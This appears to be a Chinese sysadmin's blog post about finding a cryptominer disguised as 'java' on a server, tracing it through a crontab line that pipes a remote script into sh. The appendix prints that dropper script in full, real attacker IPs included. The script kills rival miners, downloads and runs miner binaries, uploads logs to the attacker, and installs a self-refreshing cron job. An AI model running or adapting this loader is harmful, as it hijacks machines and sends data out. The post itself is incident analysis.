30号的时候,发现服务器cpu爆炸提高了!
cpu 一直满载
很好奇,(我心里一直想,哪个坑逼代码里面写了while(true);等究极操作)
31号:
今天登陆上面去一看,
首先top
我看然后看到一个进程CPU飙升到400%了
image.png
很惊讶,怎么飙升到400%,难道某个java进程除了篓子?
然后执行 ps -ef|grep 13221
image.png
发现仅仅是一个名字叫java的文件而已,感觉有点像病毒!
然后我们 百度 /var/tmp/java -c /var/tmp/w.conf
最终发现这个帖子
https://zhangnew.com/hadoop-yarn-safe.html
初步确定是病毒
首先它具有一下特征
1.文件删除了,他又重新出现了
2.cpu占用基本高达100%
后续是通过 crontab -l 发现他是通过
#* * * * * wget -q -O - http://185.222.210.59/cr.sh | sh > /dev/null 2>&1
这行代码实现
然后我们找到了 http://185.222.210.59/cr.sh
哼哼!!
期间用过 tcpdump 也没啥作用,去检测ip,但是无奈的ip太多,及其麻烦!
附录:
cr.sh脚本,大家好好看看是干嘛的
#!/bin/bash
pkill -f cryptonight
pkill -f sustes
pkill -f xmrig
pkill -f xmr-stak
pkill -f suppoie
ps ax | grep "config.json -t" | grep -v grep | awk '{print $1}' | xargs kill -9
ps ax | grep 'wc.conf\|wq.conf\|wm.conf\|wt.conf' | grep -v grep | grep 'ppl\|pscf\|ppc\|ppp' | awk '{print $1}' | xargs kill -9
rm -rf /var/tmp/pscf*
rm -rf /tmp/pscf*
DIR="/tmp"
if [ -a "/tmp/java" ]
then
if [ -w "/tmp/java" ] && [ ! -d "/tmp/java" ]
then
if [ -x "$(command -v md5sum)" ]
then
sum=$(md5sum /tmp/java | awk '{ print $1 }')
echo $sum
case $sum in
183664ceb9c4d7179d5345249f1ee0c4 | b00f4bbd82d2f5ec7c8152625684f853)
echo "Java OK"
;;
*)
echo "Java wrong"
pkill -f w.conf
sleep 4
;;
esac
fi
echo "P OK"
else
DIR=$(mktemp -d)/tmp
mkdir $DIR
echo "T DIR $DIR"
fi
else
if [ -d "/var/tmp" ]
then
DIR="/var/tmp"
fi
echo "P NOT EXISTS"
fi
if [ -d "/tmp/java" ]
then
DIR=$(mktemp -d)/tmp
mkdir $DIR
echo "T DIR $DIR"
fi
WGET="wget -O"
if [ -s /usr/bin/curl ];
then
WGET="curl -o";
fi
if [ -s /usr/bin/wget ];
then
WGET="wget -O";
fi
f2="185.222.210.59"
downloadIfNeed()
{
if [ -x "$(command -v md5sum)" ]
then
if [ ! -f $DIR/java ]; then
echo "File not found!"
download
fi
sum=$(md5sum $DIR/java | awk '{ print $1 }')
echo $sum
case $sum in
183664ceb9c4d7179d5345249f1ee0c4 | b00f4bbd82d2f5ec7c8152625684f853)
echo "Java OK"
;;
*)
echo "Java wrong"
sizeBefore=$(du $DIR/java)
if [ -s /usr/bin/curl ];
then
WGET="curl -k -o ";
fi
if [ -s /usr/bin/wget ];
then
WGET="wget --no-check-certificate -O ";
fi
echo "" > $DIR/tmp.txt
rm -rf $DIR/java
download
if [ -x "$(command -v md5sum)" ]
then
sum=$(md5sum $DIR/java | awk '{ print $1 }')
echo $sum
case $sum in
183664ceb9c4d7179d5345249f1ee0c4 | b00f4bbd82d2f5ec7c8152625684f853)
echo "Java OK"
cp $DIR/java $DIR/ppl3
;;
*)
$WGET $DIR/java https://transfer.sh/rKCkr/zzz > $DIR/tmp.txt 2>&1
echo "Java wrong"
sum=$(md5sum $DIR/java | awk '{ print $1 }')
case $sum in
183664ceb9c4d7179d5345249f1ee0c4 | b00f4bbd82d2f5ec7c8152625684f853)
echo "Java OK"
cp $DIR/java $DIR/ppl3
;;
*)
echo "Java wrong2"
;;
esac
;;
esac
else
echo "No md5sum"
fi
sumAfter=$(md5sum $DIR/java | awk '{ print $1 }')
if [ -s /usr/bin/curl ];
then
echo "redownloaded $sum $sizeBefore after $sumAfter " `du $DIR/java` >> $DIR/tmp.txt
curl -F "file=@$DIR/tmp.txt" http://$f2/re.php
fi
;;
esac
else
echo "No md5sum"
download
fi
}
download() {
if [ -x "$(command -v md5sum)" ]
then
sum=$(md5sum $DIR/ppl3 | awk '{ print $1 }')
echo $sum
case $sum in
183664ceb9c4d7179d5345249f1ee0c4 | b00f4bbd82d2f5ec7c8152625684f853)
echo "Java OK"
cp $DIR/ppl3 $DIR/java
;;
*)
echo "Java wrong"
download2
;;
esac
else
echo "No md5sum"
download2
fi
}
download2() {
f1=$(curl 185.222.210.59/g.php)
if [ -z "$f1" ];
then
f1=$(wget -q -O - 185.222.210.59/g.php)
fi
if [ `getconf LONG_BIT` = "64" ]
then
$WGET $DIR/java http://$f1/xm64?$RANDOM
else
$WGET $DIR/java http://$f1/xm32?$RANDOM
fi
if [ -x "$(command -v md5sum)" ]
then
sum=$(md5sum $DIR/java | awk '{ print $1 }')
echo $sum
case $sum in
183664ceb9c4d7179d5345249f1ee0c4 | b00f4bbd82d2f5ec7c8152625684f853)
echo "Java OK"
cp $DIR/java $DIR/ppl3
;;
*)
echo "Java wrong"
;;
esac
else
echo "No md5sum"
fi
}
if [ ! "$(ps -fe|grep '/tmp/java'|grep 'w.conf'|grep -v grep)" ];
then
downloadIfNeed
chmod +x $DIR/java
$WGET $DIR/w.conf http://$f2/w.conf
nohup $DIR/java -c $DIR/w.conf > /dev/null 2>&1 &
sleep 5
rm -rf $DIR/w.conf
else
echo "Running"
fi
if crontab -l | grep -q "185.222.210.59"
then
echo "Cron exists"
else
echo "Cron not found"
LDR="wget -q -O -"
if [ -s /usr/bin/curl ];
then
LDR="curl";
fi
if [ -s /usr/bin/wget ];
then
LDR="wget -q -O -";
fi
(crontab -l 2>/dev/null; echo "* * * * * $LDR http://185.222.210.59/cr.sh | sh > /dev/null 2>&1")| crontab -
fi
pkill -f logo4.jpg
pkill -f logo0.jpg
pkill -f logo9.jpg
pkill -f jvs
pkill -f javs
pkill -f 192.99.142.248
rm -rf /tmp/pscd*
rm -rf /var/tmp/pscd*
crontab -l | sed '/192.99.142.232/d' | crontab -
crontab -l | sed '/192.99.142.226/d' | crontab -
crontab -l | sed '/192.99.142.248/d' | crontab -
crontab -l | sed '/logo4/d' | crontab -
crontab -l | sed '/logo9/d' | crontab -
crontab -l | sed '/logo0/d' | crontab -
